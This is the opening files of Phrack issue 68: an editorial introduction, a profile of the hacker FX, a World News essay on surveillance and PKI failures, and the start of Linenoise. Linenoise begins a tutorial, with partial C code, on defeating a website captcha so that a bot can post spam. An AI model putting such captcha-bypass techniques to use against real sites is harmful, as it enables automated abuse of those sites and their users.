============== Page 1/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13 |=-----------------------------------------------------------------------=| |=-------------------------=[ Introduction ]=----------------------------=| |=-----------------------------------------------------------------------=| |=----------------------=[ by the Phrack staff ]=------------------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ April 14, 2012 ]=-------------------------=| |=-----------------------------------------------------------------------=| "C is quirky, flawed, and an enormous success." -- Dennis Ritchie October 2011, a legend has fallen... _____.______.______._____ \`\ /'/ \ | | / >|___,____,____,___|< /d$$$P ,ssssssssssss. \ /d$$$P ,d$$$$$$$$$$$$$b \ <=====w======w======w=====> \ \____> \_____/ <____/ / \_____________________/ pb Dennis Ritchie, proud father of nothing less than our beloved C language and UNIX operating system, is gone. While the world has been crying over the loss of Steve Jobs, little has been written about Dennis' death. Saying that his inventions influenced the hacking community in a way even he probably never knew is _not_ an exaggeration. Think about it: how many of us became hackers because we discovered C, related bugs or UNIX? Dennis, the world might not be aware of your unbelievable contribution but we are. Farewell dear friend, may you rest in peace. -- anonymous bug hunter -----( Dark Thoughts )----- Today I woke up thinking about the death of this Chinese little girl [1]. I felt bad. It's true that watching the youtube video was disturbing but something kept hitting my mind. What if the incident had occurred in my country? Would people really have behaved any differently? I have doubts. Just because a video leaked on the Internet people conveniently blamed China, a country both controverted and feared. What if the modern society in general was tending to slowly become amoral and cold? A proof is that we all watched this video fully aware of its content. Vicious, aren't we? But not only that. We're also fucking cowards. Suddenly discovering that there is a darkness hidden inside the very roots of our society is dramatic. But pretending to ignore the fact that there are countries in this world where atrocious massacres are part of the daily life seems fine. It was written in the US Declaration of Independence that "We hold these truths to be self-evident, that all men are created equal [...]". How could that possibly be true? This morning I was at home, healthy, comfortably sitting in front of my computer screen, with a cup of coffee in hand. A few minutes later, I was working (or luxuriously pretending to be) to earn money that I spent in the bar that night with my friends. In the mean time, not so far away, people were killed, raped, mutilated. The truth is that I don't even care when I think about it. This morning I was pretending being concerned for other people, but tonight I don't give a shit anymore. Something must be wrong. -- anonymous coward / Phrack [1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/ Chinese-girl.htm -----( Phrack Issue #68 )----- Hello Phrackers! How are you guys doing? We hope well. We hope your latest exploit works reliably (again) and all your bounces are alive and pinging. We also hope you and your friends still are out of prison, or recently came out (wink wink). Us, we're doing good. Looks like we did it again and a new release is here. Ya-hoo. This release brings you an amazing selection of hacking goodies. We have two papers on applied cryptanalysis by greg and SysK, an area in which we hope to see more submissions for the next issues. We are also thrilled about the return of the Art of Exploitation section. And what a return; we have for you not one, but two detailed papers demonstrating that exploitation is indeed an art form. Speaking of exploitation, did you ever wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by argp & huku and find out. Are you hacking Windows' farms? Be sure to check the p1ckp0ck3t's novel approach of stealing Active Directory password hashes. Perhaps you prefer malware analysis and identification of malware families; Pouik and G0rfi3ld have written a paper with a focus on Android malware that will satisfy you. Android is quickly becoming the standard mobile platform. I think it's time for an Android/ARM kernel rootkit. Start from dong-hoon you's paper and hack your own. styx^ continues the kernel fun with a paper that updates truff's LKM infection techniques to 2.6.x and 3.x Linux kernels. If for whatever reason you're afraid of messing with your kernels, Crossbower shows you how to create a stealthy userland backdoor without creating new processes or threads. We also believe that you will find merit with the two main non technical papers of this issue. Both address more or less the same topics, but from two totally different points of view. On one hand, we have an analysis of how the happiness that hacking brings to all of us can and is corrupted by the security industry. One the other, a call to all hackers to take a side between staying true to the spirit of hacking and selling out to the military intelligence industrial complex. Read them, think about them and take a side. Remember, "The hottest places in hell are reserved for those who in times of great moral crisis maintain their neutrality". Phrack World News is also making a comeback, courtesy of TCLH. In International Scenes we explore Korea and the past of the Greek scene. Loopback has increased and we decided to resurrect Linenoise as we had some tiny but not less interesting submissions. While being eligible for an issue remains hard, submitting for Linenoise may be an easier way for people to share tricks in the next issues. We are proud to have FX prophiled in this epic issue. As an added gift, FX wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral, as all great hacker creations, lives on as long as the hackers behind it are fueling it with their passion. Speaking of hacker passion, this issue re-establishes a long lost connection. Phrack and SummerCon are again bonded on the 25th anniversary of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two papers; a history of the conference from its beginning in 1987 to this year, and of course one of the Art of Exploitation papers. Believe it or not it was _fucking_ hard to prepare this issue. It's no news that the mentality of the hacking community has changed, but this time we had to face multiple deceptions. It's not the first time, however the quantity makes this event scary. It demonstrates how rotten and corrupted the so-called spirit of some people pretending to be part of the underground has become. There's a time when you realize that you've lost count of the battles you lost, but you still kinda won enough to keep faith. More importantly, you realize that you still care. Granted, it's not the deep, mystical and life changing moment that movies display -- the huge pile of shit you pushed out of the door just before getting to sleep is still there. It maybe just stinks a little less. But we care, hell, we really care about Phrack and what it means. It costs time and frustration, many battles lost, it faces the two-point-oh revolution (lots of quality stuff goes into blogs, for immediate consumption) and the money drop by the security industry, but the satisfaction of seeing it out again is huge. Yes, we care. And that's not just because we're a bunch of old farts that stay attached to the past. We care because it's a constant, maybe feeble but constant, heartbeat of that world, that community that we grew up and now live in. You know, that little thing called 'the Underground' that we are proud and honored to somehow, in part, represent. We've heard from many corners that 'the Underground' is dead. We'd love to hear those people describe what the Underground is, then. Sure, things change, evolve. Laws, computing power, money invested, political links, technology, every piece moves fast and reshapes the landscape. But if you're reading these lines today, if you've just finished a 36-hour coding, hacking marathon, you're keeping it alive. So thank you, for that. Thank you to the authors for finding the time of sharing their knowledge. Thank you to anyone that setups a new connection. Thank you to whomever fights for information and freedom. Thanks crews. Happy hacking, Phrackers. You guys are the BEST heartbeat in the world. -- the Phrack staff ______ _ _ ______ ______ _ _ __ _ __ _____ (_____ \| | | (_____ \ /\ / _____) | / ) _| || |_ / / / ___ \ _____) ) |__ | |_____) ) / \ | / | | / / (_ || _) / /_ ( ( ) ) | ____/| __)| (_____ ( / /\ \| | | |< < _| || |_ / __ \ > > < < | | | | | | | | |__| | \_____| | \ \ (_ || _| (__) | (___) ) |_| |_| |_| |_|______|\______)_| \_) |__||_| \____/ \_____/ - By the community, for the community. - $ cat p68/index.txt <--------------------------( Table of Contents )--------------------------> 0x01 Introduction ...................................... Phrack Staff 0x02 Phrack Prophile on FX ............................. Phrack Staff 0x03 Phrack World News ................................. TCLH 0x04 Linenoise ......................................... various 0x05 Loopback .......................................... Phrack Staff 0x06 Android Linux Kernel Rootkit ...................... dong-hoon you 0x07 Happy Hacking ..................................... Anonymous 0x08 Practical cracking of white-box implementations ... SysK 0x09 Single Process Parasite ........................... Crossbower 0x0a Pseudomonarchia jemallocum ........................ argp & huku 0x0b Infecting loadable kernel modules ................. styx^ 0x0c The Art of Exploitation: MS IIS 7.5 Remote Heap Overflow ................... redpantz 0x0d The Art of Exploitation: Exploiting VLC, a jemalloc case study ............. huku & argp 0x0e Secure Function Evaluation vs. Deniability in OTR and similar protocols ............................. greg 0x0f Similarities for Fun and Profit ................... Pouik & G0rfi3ld 0x10 Lines in the Sand: Which Side Are You On in the Hacker Class War .................................. Anonymous 0x11 Abusing Netlogon to steal an Active Directory's secrets ........................................... the p1ckp0ck3t 0x12 25 Years of SummerCon ............................. Shmeck 0x13 International Scenes .............................. various <-------------------------------------------------------------------------> -----( GreetZ for issue #68 )----- - FX: epicness personified - herm1t: you have our support - TCLH: for everything - x82: deepest apologies for the 1 year wait - anonymous authors: best part of this issue - sysk: keep submitting man! - redpantz & Shmeck: Phrack and SummerCon bonded again - greg: schooling Alice and Bob - Crossbower: parasite zoologist - the p1ckp0ck3t: be wary or he will get your hashes - huku & argp: the scourge of memory allocators - styx^: yes we are hardcore reviewers - Pouik & G0rfi3ld: who the hell is G0rfi3ld??? ;> - scene phile writers: you have big balls guyz - linenoise writers: Eva you're soooooooo cute :3 - our generous hoster: a contribution not forgotten ;) - z4ppy, ender: external reviews are paid in beers - b3n: too bad we didn't use your stuff - No greetz, no thankz to: you know who you are :< And of course many thanks to the loopback contributors :') -----( Phrack Magazine's policy )----- phrack:~# head -n 22 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of * the editors and contributors, truthful and accurate. When possible, * all facts are checked, all code is compiled. However, we are not * omniscient (hell, we don't even get paid). It is entirely possible * something contained within this publication is incorrect in some way. * If this is the case, please drop us some email so that we can correct * it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for * the entirely stupid (or illegal) things people may do with the * information contained herein. Phrack is a compendium of knowledge, * wisdom, wit, and sass. We neither advocate, condone nor participate * in any sort of illicit behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in * the articles of Phrack Magazine are intellectual property of their * authors. * These opinions do not necessarily represent those of the Phrack Staff. */ -----( Contact Phrack Magazine )----- < Editors : staff[at]phrack{dot}org > > Submissions : staff[at]phrack{dot}org < < Commentary : loopback[@]phrack{dot}org > > Phrack World News : pwned[at]phrack{dot}org < Submissions may be encrypted with the following PGP key: (Hint: Always use the PGP key from the latest issue) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PHRACK 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 =cK7U -----END PGP PUBLIC KEY BLOCK----- -----( EOF )----- ============== Page 2/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13 |=-----------------------------------------------------------------------=| |=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ FX of Phenoelit ]=-----------------------=| |=-----------------------------------------------------------------------=| |=---=[ Specifications Handle: FX AKA: 41414141 Handle origin: First and last letter of my first name (I had no idea it had a meaning in movie production) Produced in: East Germany Urlz: http://www.phenoelit.de/ Computers: Metric tons of them Creator of: much crappy and useless code Member of: Phenoelit, Toolcrypt Projects: PH-Neutral, Phonoelit Codez: IRPAS (bunch of tools that somehow still cause havoc) cd00r.c (later called PortKnocking by the copycats) works-on-my-machine exploits Active since: late 80s Inactive since: unlikely to happen |=---=[ Favorites Actors: don't care Films: Hackers (1995) - imagine it actually would be like that Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert Meetings: Bars Sex: ACK Books: Computer Security, Time-Life Books (1986), and it began Novel: too many to list Music: Progressive House Kitsch Alcohol: Oh Yes! Cars: Mercedes-Benz Girls: SYN Foods: German I like: honesty, pragmatism, realism, tolerance, style, empathy I dislike: fakes, aggression, ignorance, senselessness, deception |=---=[ Describe your life in 3 sentences Every work day is packed with challenges, great hacks and awesome people. Every free day compensates with non-security hobbies and sleep. This sentence is padding. |=---=[ First contact with computers At the age of 6 at the computing department of the university of Sofia, Bulgaria. Didn't leave much of an impression, as I was only allowed to play a silly game (in CGA color). Second contact happened at the age of 9 or 10, a Robotron Z9001. It came without software but with a typewriter made programming manual for BASIC. I read it cover to cover. |=---=[ Passions: What makes you tick Like-minded people: Conversations give me the greatest boost. Let me explain something to a person who gets it, and I will have a new idea how to take it further. Also, work. That state of a problem where it is no longer fun, but actual work, to get it where you want it. Not letting go. Stubbornness compensates for a lot of talent. |=---=[ Unix or Windows? Juniper or Cisco? Unix and Windows. I like both, I use both, they both suck in their own ways. The only thing you will not see me with is anything Apple. Juniper, Cisco, all networking equipment is broken, Cisco being in the lead. How can you sell equipment that is in most cases simply forwarding IPv4 packets from interface 1 to interface 2 since 1987 and still crash on parsing IPv4 in 2011? |=---=[ Color of hat? undef($hat); |=---=[ Entrance in the underground First contact must have been around 1990. Shortly after the Berlin wall came down, I got my first 80286 machine and hung out at a computer club in a Thaelmann Pionieers' (youth organization of schoolchildren in East Germany) youth center. In a back room, two older guys downloaded infrared images from Russian satellites. While the download ran, they cracked PC games for the kids to pass the time. First time I saw a hex dump. I had the great honor to meet many people that I consider(ed) part of the real underground. Some of them still are. But I don't think I was ever part of that myself. |=---=[ Which research have you done or which one gave you the most fun? Anything I did was fun at the time, why doing it otherwise? I generally like fiddling around with Bits and bytes more than hunting bugs in large environments. Writing disassemblers, debuggers and the like is a pleasure. It's also monkey work. But it lets you feel so much about the history and design of a platform. I also like network protocols, because you can often see the vulnerability potential by reading the specifications already. Protocols are interfaces and interfaces are where the bugs live. Also, logging functions love to use packet contents and fixed buffers. |=---=[ Personal general opinion about the underground Much. Fucking. Respect. Seriously, what is published is only the tip of an iceberg. Once you talk to people, it's simply insane how much knowledge there is. Interestingly, I have the impression that little of this knowledge is ever used. One aspect often considered essential in the underground I dislike: Owning people fails to impress me. It's like beating people up, everyone can do that and none of it makes it an achievement. If you found that vulnerability yourself and made a custom exploit, that's an achievement. |=---=[ Personal general opinion about the German underground Regardless of the definition of underground, the hacking scene in Germany is very alive and diverse. However, I would love to see more of them write exploits. |=---=[ Personal general opinion about the European underground The U.S. is much more visible, but Old Europe kicks their ass any time. Just looking at the French scene is scary. If only they would speak English ;) And don't even get me started on east Europe and Russia. |=---=[ Memorable experiences/hacks - Finding my first overflow in Cisco IOS TFTP, resisting the urge to post it immediately and deciding to write an exploit. Then realizing how much of a journey lay ahead of me, since I had never written any exploit before. - Writing an exploit that needed to be stable, i.e. work in the wild. After weeks of frustration finally understanding that PoC is only 10% of exploit development. Halvar saving my ass again with a simple hint. - Being asked by my employer to take the CISSP exam, being initially rejected due to my "connections to hackers" as a DEFCON speaker, being allowed to take the exam and finding a 12 octet MAC address in a question. Finding out afterwards that (ISC)2 probably has more admin users on their web servers than paying members. - Asking someone to look at Cisco IOS exploitation after I spent about a decade with it and getting my ass kicked in less than a week. True talent trumps everything. - Caesar's Challenge over the years: hearing about it, being invited in, being told by Caesar that he accepts my solution, welcoming Caesar to PH-Neutral. - Being invited to train a team of hackers and later finding out that the whole purpose of the exercise was to cure them from their respect for me. And it worked. - The nights in Wuxi (China) with the Wuxi Pwnage Team. |=---=[ Memorable people you have met - Halvar Flake I have to thank this man for a lot of things in my life. - Sergey Bratus A great man with a great vision. He changed how I look at academia and hacking. With people like Sergey, there is hope. - John Lambert One of the smartest men I've ever met. Just in case you wonder why Windows exploitation is so challenging today. - Dan Kaminsky Dan and I share a passion for protocols. We first met in 2002, about five times, at cons all over the planet, and talked IP(v4). Good times. - ADM, that one summer |=---=| Memorable places you have been to - Idaho Falls |=---=[ Disappointing people you have met Many manufactured or self-styled experts giving presentations at conferences. If you didn't write or at least read the code in question, shut up. The number of charlatans is unfortunately growing steadily. Some would probably count me in that category as well. Also, friends that betray they very people that trust them most. |=---=[ Who came up with the name "Phenoelit" and what does it mean? Nothing to see here, move on. |=---=[ Who are you guys? Just friends. |=---=[ Who designed those awesome Phenoelit t-shirts? I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy doing them. For PH-Neutral, the process was that I had to come up with a motive and would do all the work, Mumpi watching me, drinking beer and complaining. It would not have worked any other way. |=---=[ Phenoelit vs 7350 vs THC? We met 7350 and THC first time at the 17c3 and became friends with several of them over time. I sincerely miss 7350, but their time had come. |=---=[ Things you are proud of The team I am blessed to work with. |=---=[ Things you are not proud of - Writing shitty exploits - Having a pretty good hand at picking research topics that are not relevant to the real world - Being strictly single-tasking |=---=[ Most impressive hackers - Dvorak - Halvar Flake - Philippe Biondi - Ilja van Sprundel - Anonpoet - Greg - Last Stage of Delirium This list is biased by me not knowing many of the really impressive hackers. |=---=[ Opinion about security conferences Security conferences have been essential for my personal development and I still love to go to them. I have a preference for smaller cons, since it is more likely to get to talk to people. Almost any talk has something for me to take away. But more important is the hallway track and going out with fellow hackers. The distinction between hacker cons and corporate or product security conferences used to be clear. It is no longer, which is sad. |=---=[ Opinion on Phrack Magazine IMHO one of the most well regarded e-zines in the world, influencing much research over the time of its existence. Just look at how many academic publications cite Phrack articles. Keep it up! |=---=[ What you would like to see published in Phrack? I think Phrack does just fine. For me, exploitation techniques are at the heart of Phrack. I also enjoy reading about environments that not many people have access to: control systems of all kinds, for example. Maybe you should aim for more timely releases though. |=---=[ Personal advices for the next generation That implies that I'm old and expired, right? The one advice I would give is: Don't care about the opinion of others when it comes to research. It doesn't matter if they think it's cool, you must think it's cool. Look for and credit prior art, build on what is there already and have fun doing so. And if you really have to use Python, understand that error handling is not the same thing as stack traces. Catch your exceptions and handle them, or at least display something useful. |=---=[ Your opinion about the future of the underground Predictions are hard, especially when they concern the future. |=---=[ Shoutouts to specific (group of) peoples To the hacker and vx groups of the 80s and 90s, who built the foundation of everything we still concern ourselves with today. |=---=[ Flames to specific (group of) peoples To the snake-oil security product vendors, who refuse to innovate and bind available talent in signature writing sweat jobs, because that model pays them so well. Your "protections" add vulnerabilities to every aspect of modern networks, and you know it. The halting problem is UNDECIDABLE! |=---=[ Quotes "Does it just look nice or is it correct?" - zynamics developer about a control flow graph "Nine out of the ten voices in my head say I'm not schizophrenic. The other one hums the melody of Tetris." |=---=[ Anything more you want to say I would like to thank the Phrack staff for this honor, although I'm still convinced there are 0x100 people who deserved it more. |=---=[ A eulogy for PH-Neutral ]=---=| We created PH-Neutral in 0x7d3 as an attempt to bring together the people we respected most. We were simply unaware of the other small events that already existed. The intention was to have an informal meeting with ad-hoc workshops and a great party. We failed at the party, despite a full-blown dance floor. However, the people actually worked together and discussed their projects and exploits. We were sending out the invitations individually by email and I was surprised about the many positive reactions. We would not have thought that so many well-known and interesting people would actually show up. Over the years, the event grew. Although we kept it invite-only, the mechanism for invitations had to consider people that were there in the past as well as fresh blood. Therefore, one way or another, it had a snow ball effect to it. But in the early years, this was a good thing. There was an astonishing amount of innovation going on during the first five years. We never expected to see people actually working together. It was the time of sharing code and knowledge, of searching for JTAG on a dance floor and of the Vista ASLR release. The bigger the event got, the more the focus shifted from hacking to party. Since that corresponded with our second initial goal, we did encourage it. We really like to party with our friends, and by party we mean actual dancing and not just standing around and getting drunk. It was amazing to see how well the party developed over the years. Despite the growth, it still had a very intimate feeling. Initially meant as a joke during setup of the second PH-Neutral, we had decided to not have it run forever. For one, we didn't want to see it going down and fading away. When more and more conferences started to show up on the map, it only encouraged us to conclude the story of PH-Neutral. It had its time and place. The last PH-Neutral 0x7db then proved that the decision was right. It was that little bit of too many people that turns a large group of international friends into a somewhat anonymous crowd. Although luckily not many guests noticed, it changed the way we had to run the event completely. Where in the years before, we could hack and party with our friends, we had to fire-fight, manage and regulate. That was not the way it was meant to be for us, so it was a good time to call it quits. PH-Neutral was made into what it was by the people that participated, more so than any other event I know. The people decided on the spin of each year's event by how they filled the frame we gave them. It was their party and they took it and made it great. Thank you forever! [ EOF ] ============== Page 3/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13 |=-----------------------------------------------------------------------=| |=------------------------=[ Phrack World News ]=------------------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ by TCLH ]=------------------------------=| |=-----------------------------------------------------------------------=| It is been a while since the last Phrack World News, and much has happened in our world since then. Governments have been overthrown [1], human rights partially restored in one country, and taken away in the next [2]. The so-called first world has been bought, delivers monitoring and suppression equipment to totalitarian countries [3] as well as making its use a legal requirement in their owni [4]. The content mafia, considering every form of creative and work output their property, has declared war on all internet citizen. No matter if picture, song, movie or academic paper, you shall pay for its consumption or be banned from the net [5]. That they are actually trying to resist evolution [6] is of no concern to them. In times like that, where your network traffic may go though more deep packet inspection engines than observable hops in traceroute, the hacker shall reconsider his ways of communication. It is no longer enough to SSH/VPN into one of your boxes and jump into your screen sessions, as the communication of that box is monitored as much as your home network connection. Global surveillance is no longer stuff from science fiction books, or attributed only to the most powerful secret services in the world. It becomes a requirement for most ISPs to stay in business. They can either sell you, or they can sell their company, and you can bet that the later is not an option they consider. Besides, traffic patterns of the average internet user change. We are approaching a time when the ordinary user will only emit HTTP traffic with his daily activities, making it easy for anyone interested to single out the more creative minds, just by the fact that they still use protocols like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to us to come up with new and creative ways of using this internet before packets get dropped based on their protocol characteristics and we find ourselves limited to Google+ and Facebook. At the same time, the additional protections we have come to rely on prove to be as bad as we always thought they might be. When breaking into a certificate authority is as easy as it was with DigiNotar [7], when the database of Comodo [8] ends up in BitTorrents, we are facing bigger challenges than ever before. There are various discussions all over the net on how to deal with the mess that is our common PKI. From the IETF [9] to nation states, everyone has their own ideas. When certificate authorities are taken over by governments or forced to issue Sub-CA certificates to the same [10], it's not a trust mechanism we shall rely on. An attitude that this is someone else's problem doesn't help. As more and more functions of daily life move online, everyone is exposed to these problems. Even if you know how to spot certificate changes, you will still need to access the web site. HTTPS doesn't provide a plan B option. The CA nightmare calls for the gifted and smart people to work together and find a long term dependable solution. This is the time where your talent, skills and experience is required, unless you are fine with government and vendor driven committees to "solve" it. Meanwhile over at IRC's little pre-teen sister Twitter, whose attention span is shorter than that of a fruit fly and easily bought, people hype so-called solutions [11] to the problem without doubts. Although their heros abandon privacy solutions people depend on the moment someone waves a little money in their face [12], the masses rather believe in a savior than to think and evaluate for themselves. Are you one of them? Unquestioned believe becomes the new normal. Whether it is Google or Apple fanboyism, the companies can do whatever they want. Apple ships products with several year old vulnerabilities [13] in open source components they reused and nobody notices. Everyone can make X.509 certificates that iPhone and iPad will happily accept [14]? No problem. Think back and consider the shit storm if that would have been Microsoft. These companies feel so invincible that Apple's App Store Guidelines [15] openly state: "If you run to the press and trash us, it never helps." Critical thinking seems to become a challenge when you get what you want. Just look at how many hackers use Gmail without any end-to-end encryption, because it just works. Thich hacker using a hotmail email address was ever taken serious? Where is the difference? What Apple and Google are for the hip generation, Symantec is for governments and corporations. They are seen as the one company that will protect us all. When the source code of PCAnywhere is leaked [16] and the same company simply advises its users to no longer use that software product [16], you get an idea of how they evaluate the security of it themselves. And what about all the systems in daily life that depend on it? If nobody used PCAnywhere, Symantec would have stopped selling it long ago. Therefore, they simply left a large user base out in the cold. And what happens? Nothing. Except, maybe, that some have fun with various remote access points. It all comes down to knowledge. Knowledge cannot be obtained by believe. Believe is a really bad substitute for actually knowing. And what is the hacker community other than first and foremost the quest for knowledge that you found out yourself by critically questioning everything put in front of you. What you do with that knowledge is a question everyone has to answer himself. But if we stop to learn, experiment and play, we stop being hackers and become part of the masses. It is a sign of the times when only very few hackers speak IPv6, leave alone use it. When you see more fuzzers written than lines of code actually read, because coding up a simple trash-generator is so much easier than actually understanding what the code does and then precisely exploiting it. The quest for knowledge defines us, not money or fame. Let's keep it up! [1] https://en.wikipedia.org/wiki/Arab_spring [2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising [3] http://buggedplanet.info/index.php?title=EG [4] https://en.wikipedia.org/wiki/Telecommunications_data_retention [5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29 [6] http://www.wired.com/threatlevel/2012/02/peter-sunde/ [7] https://en.wikipedia.org/wiki/DigiNotar [8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security [9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html [10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929 [11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29 [12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter [13] http://support.apple.com/kb/HT5005 [14] http://support.apple.com/kb/HT4824 [15] https://developer.apple.com/appstore/guidelines.html [16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/ [17] http://www.symantec.com/connect/sites/default/files/pcAnywhere %20Security%20Recommendations%20WP_01_23_Final.pdf [ EOF ] ============== Page 4/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13 |=-----------------------------------------------------------------------=| |=-----------------------=[ L I N E N O I S E ]=-----------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ various ]=-------------------------=| |=-----------------------------------------------------------------------=| Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we had great short and sweet submissions we thought it was about time to resurrect it. After all, "a strong linenoise is key" ;-) So, dear hacker, enjoy a strong Linenoise. --[ Contents 1 - Spamming PHRACK for fun and profit -- darkjoker 2 - The Dangers of Anonymous Email -- DangerMouse 3 - Captchas Round 2 -- PHRACK PHP CoderZ Team 4 - XSS Using NBNS on a Home Router -- Simon Weber 5 - Hacking the Second Life Viewer For Fun and Profit -- Eva 6 - How I misunderstood digital radio -- M.Laphroaig 7 - The 1130 Guide to Growing High-Quality Cannabis -- 1130 |=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=| In this paper I'd like to explain how a captcha can be bypassed without problems with just a few lines of C. First of all we'll pick a captcha to bypass, and, of course, is there any better captcha than the one of this site? Of course not, so we'll take it as example. You may have noticed that there are many different spam messages in the comments of the articles, which means that probably someone else has already bypassed the captcha but, instead of writing an article about it, decided to spend his time posting spam all around the site. Well, I hope that this article will also be taken into account to make the decision to change captcha, because this one is really weak. First of all we're going to download some captchas, so that we'll be able to teach our bot how to recognise a random captcha. In order to download some captchas i've written this PHP code: We're downloading 200 captchas, which should be enought. Ok, once we'll have downloaded all the images we can proceed, cleaning the images (which means we're going to remove the "noise". In these captchas the noise is just made of some pixel of a lighter blue than the one used to draw the letters. Well, it's kind of a mess to work with JPEG images, so we'll convert all the images in PPM, which will make our work easier. Luckily under Linux there's a command which makes the conversion really easy and we won't need to do it manually: convert -compress None input.jpg output.ppm Let's do it for every image we have: Perfect, now we have everything we need to proceed. Now, as I said earlier, we've to remove the noise. That's a function which will load an image and then removes the noise: void load_image (int v) { char img[32],line[1024]; int n,i,d,k,l,s; FILE *fp; sprintf (img, "ppm/%d.ppm",v); fp = fopen (img, "r"); do fgets (line, sizeof(line),fp); while (strcmp (line, "255\n")); i=0; d=0; k=0; int cnt=0; while (i!=40) { fscanf (fp,"%d",&n); captcha[i][d][k]=(char)n; k++; if (k==3) { k=0; if (d<119) d++; else { 